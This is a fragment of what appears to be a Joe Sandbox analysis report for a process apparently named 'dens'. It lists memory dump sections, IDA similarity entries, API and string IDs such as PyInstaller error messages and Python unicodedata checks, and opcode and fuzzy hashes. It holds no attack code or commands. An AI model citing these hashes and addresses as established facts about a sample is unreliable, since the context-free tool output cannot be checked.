                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction ID: 2465b6bc31d6e694cec9312289ad023290a5290f080061e0e327b4e5820cccf0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B21B072A19B8186EB20DB54BC867EA6394FF883A4F400135FE8C83659DF7CD2858745
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentSubtypeType_
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$east_asian_width
                                                                                                                                                                                                                                              • API String ID: 1522575347-3913127203
                                                                                                                                                                                                                                              • Opcode ID: 7b891638b4a45313673a93616f0d216ddcfc167a757208e07fea525010fbe4c5
                                                                                                                                                                                                                                              • Instruction ID: aaf029860956958ca8f01a418ec20df7b8bda0ca6c67404533e2e7e75a3ab371
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b891638b4a45313673a93616f0d216ddcfc167a757208e07fea525010fbe4c5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B321C225F08A828AEB4C9B2194709797BA2FF44B84F4480B5D63E036DCDF2CE49AC704
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: not a numeric character
                                                                                                                                                                                                                                              • API String ID: 1034370217-2058156748
                                                                                                                                                                                                                                              • Opcode ID: 8a252d4494416c01de2789638a4ecad70e8503ee6f61509ac703bcac1011aaf0
                                                                                                                                                                                                                                              • Instruction ID: 916c4e31dd6ffad13b642ef407976df35836044fc6fc85a4f9285bcd38aed73f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a252d4494416c01de2789638a4ecad70e8503ee6f61509ac703bcac1011aaf0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0216F26F0C9438AEB599B26E43497876A2AF44B84F4481B1C93E476DCDF2CE44B8708
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: not a decimal
                                                                                                                                                                                                                                              • API String ID: 3750391552-3590249192
                                                                                                                                                                                                                                              • Opcode ID: 30abf5ee6eb06e173e75edeec379c503cf6988d9432b31e93c7c03d97c2bbd6f
                                                                                                                                                                                                                                              • Instruction ID: e7088cc132e864e1f3e081d9c42219deb3534981488aaf12a69608e8e0694169
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30abf5ee6eb06e173e75edeec379c503cf6988d9432b31e93c7c03d97c2bbd6f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65113365B485438BEB588B25E43493977A2AF44B84F4884B0CA6F476DCDF2CE44A8344
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                              • String ID: a unicode character$argument 1$decimal
                                                                                                                                                                                                                                              • API String ID: 3876575403-2474051849
                                                                                                                                                                                                                                              • Opcode ID: d3484de5ee44d7a33ec5e53d5364025946576caca118cb4f9bd9e3e7fb1b6d42
                                                                                                                                                                                                                                              • Instruction ID: 8167c34202da3e4d3b60257ddf2bafe4d9c388abcd850edfcf0edd7488512f05
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3484de5ee44d7a33ec5e53d5364025946576caca118cb4f9bd9e3e7fb1b6d42
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2118225B08B828AEB589B42E4609A97371EB54BC4F544072DA2E477ADCF3CE59BC304
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                              • String ID: a unicode character$argument 1$name
                                                                                                                                                                                                                                              • API String ID: 3876575403-4190364640
                                                                                                                                                                                                                                              • Opcode ID: ab7f7404489c6aefaed3bb65c109ab607c61dcc8bacd4a48ace643e301676b9f
                                                                                                                                                                                                                                              • Instruction ID: 8339727faf69e6736376c70a2b7d347757e68fbb64307307491a9707ea336e17
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab7f7404489c6aefaed3bb65c109ab607c61dcc8bacd4a48ace643e301676b9f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A311C435F08A828AEB589B42E460AA97361EB85BC4F448072DA2D4779DCF2CD55BC304
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                              • String ID: a unicode character$argument 1$numeric
                                                                                                                                                                                                                                              • API String ID: 3876575403-2385192657
                                                                                                                                                                                                                                              • Opcode ID: f2c4218ba94db24fb659ccbfd3ee4767c89f092abad47c48dbe9f437d0b50517
                                                                                                                                                                                                                                              • Instruction ID: e10d66ded7e33b94480861bcb20230d0b8c6b0f334560171dc769b164d6b7efd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2c4218ba94db24fb659ccbfd3ee4767c89f092abad47c48dbe9f437d0b50517
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C11BF32B08B828AEB589B46E460AA97320EB44B84F544072DE2D4779DCF2DE18AC704
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$mirrored
                                                                                                                                                                                                                                              • API String ID: 3979797681-4001128513
                                                                                                                                                                                                                                              • Opcode ID: 9496c058ca4f3a92d16c11e0dea8752c802f91a4b5f675f0277ed2c6365c313a
                                                                                                                                                                                                                                              • Instruction ID: fed7e27a5fbd6aa87abdd9a253ec7fbdc16bcbd9ca7e862679df5acbc7837765
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9496c058ca4f3a92d16c11e0dea8752c802f91a4b5f675f0277ed2c6365c313a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95017C64F08A438AEB5C9B61A8709B933A1BF48754F8005B1D66E472DCDE2CE59EC308
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$combining
                                                                                                                                                                                                                                              • API String ID: 3979797681-4202047184
                                                                                                                                                                                                                                              • Opcode ID: f57a56bca3f03315399802cbb188705c8f0221a3905f8c719d86b24713be5e96
                                                                                                                                                                                                                                              • Instruction ID: 5bd77df7e013d7699e2e0895db74d797d35f8203dd40f3efd6487bb9dfc76c8b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f57a56bca3f03315399802cbb188705c8f0221a3905f8c719d86b24713be5e96
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD01B120F18A438AEB1C9761E4708BD32A1BF08754F8005B5D53D432DCDE3CE19E8304
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Mem_$Capsule_Err_FreeMallocMemory
                                                                                                                                                                                                                                              • String ID: unicodedata._ucnhash_CAPI
                                                                                                                                                                                                                                              • API String ID: 3673501854-3989975041
                                                                                                                                                                                                                                              • Opcode ID: 04962b3129ec8039d4574c2b15526bc82bf072c2335504b47079f601afa57e40
                                                                                                                                                                                                                                              • Instruction ID: 823053261b48429004f284092a01ce1d206054969096924f4258f0cd1d593cac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04962b3129ec8039d4574c2b15526bc82bf072c2335504b47079f601afa57e40
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7F01D64B19B4799EB095B61E83497473A8BF58780F4814B1C86E067DCEE3CE04EC358
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction ID: eb95f7f3f48f6a0bec1191f39e3fbdbb999db267ea4a3c974252f25e370276a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCF0C261B08706C1FE148B28EC6F77A6330AF59770F440235DA6E866E8CF6CD144C302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                              • API String ID: 3510742995-1299490920
                                                                                                                                                                                                                                              • Opcode ID: 32730d387572c6d220be8f8d31a9a93a50f8bff822b157f52283308a3860c2a9
                                                                                                                                                                                                                                              • Instruction ID: 31a3c20608ded75ae7eef4e9ab420ba4df46c71bf8e87c1c0ca43dafb5a74372
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32730d387572c6d220be8f8d31a9a93a50f8bff822b157f52283308a3860c2a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1902AC2AB0CB9181EB588B15E560B7E67A0FB44B94F488271DEAD877C9CF3CE491C350
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
